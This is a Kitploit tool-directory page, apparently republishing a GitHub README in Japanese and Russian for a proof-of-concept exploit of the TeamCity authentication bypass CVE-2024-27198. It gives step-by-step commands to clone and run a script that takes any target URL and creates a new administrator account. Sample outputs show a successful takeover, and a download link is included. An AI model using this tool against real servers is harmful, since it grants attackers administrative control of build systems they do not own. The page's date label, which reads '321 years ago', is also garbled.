Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-27198 — は、TeamCityサーバーの脆弱性(CVE-2024-27198)を標的としたPoCツールです。 | Kitploit
ツール/GitHubGitHub/geniuszly/cve-2024-27198
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

は、TeamCityサーバーの脆弱性(CVE-2024-27198)を標的としたPoCツールです。

リポジトリを見る
321年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

EN

GenTeamCityExploit は、TeamCity サーバーの脆弱性 (CVE-2024-27198) を標的とする PoC ツールです。認証バイパスの欠陥を悪用して、TeamCity のバージョン検出と新しい管理者ユーザーの作成を可能にします。

機能

  • TeamCity サーバーのバージョンを抽出します。
  • 既知の脆弱性 (CVE-2024-27198) の有無を確認します。
  • サーバーが脆弱な場合、新しい管理者ユーザーを作成します。

前提条件

  • Python 3.6+: Python がインストールされていることを確認してください。
  • ライブラリ: 以下のコマンドで必要なライブラリをインストールします。
    root@kitploit:~
    pip install requests urllib3
    

使用方法

  1. リポジトリをクローンします。
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. ディレクトリに移動します。
    root@kitploit:~
    cd CVE-2024-27198
    
  3. 必要なパラメータを指定してスクリプトを実行します。
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    パラメータ:
    • -t, --target: 対象の TeamCity サーバーの URL。
    • -u, --username: 新しい管理者ユーザーのユーザー名。
    • -p, --password: 新しい管理者ユーザーのパスワード。

使用例

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

出力例

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

サーバーが脆弱でない場合、またはバージョンが見つからない場合:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

サーバーへの接続中にエラーが発生した場合:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

免責事項

このツールは教育目的のみを意図しており、所有者の明示的な許可なしにシステムで使用すべきではありません。コンピュータシステムへの不正アクセスは違法です。

RU

GenTeamCityExploit — это PoC-инструмент, нацеленный на уязвимость сервера TeamCity (CVE-2024-27198). Он позволяет обнаружить версию TeamCity и создать нового администратора, используя уязвимость обхода аутентификации.

Возможности

  • Извлекает версию сервера TeamCity.
  • Проверяет наличие известной уязвимости (CVE-2024-27198).
  • Создает нового пользователя-администратора, если сервер уязвим.

Требования

  • Python 3.6+: Убедитесь, что у вас установлен Python.
  • Библиотеки: Установите необходимые библиотеки командой:
    root@kitploit:~
    pip install requests urllib3
    

Использование

  1. Клонируйте репозиторий.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Перейдите в папку с проектом.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Запустите скрипт с обязательными параметрами.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Параметры:
    • -t, --target: URL целевого TeamCity сервера.
    • -u, --username: Имя пользователя для нового администратора.
    • -p, --password: Пароль для нового администратора.

Пример

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Пример вывода

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

В случае, если сервер не уязвим или версия не найдена:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

При возникновении ошибки подключения к серверу:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Отказ от ответственности

Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться на каких-либо системах без явного разрешения их владельца. Несанкционированный доступ к компьютерным системам является незаконным.

ツールをダウンロード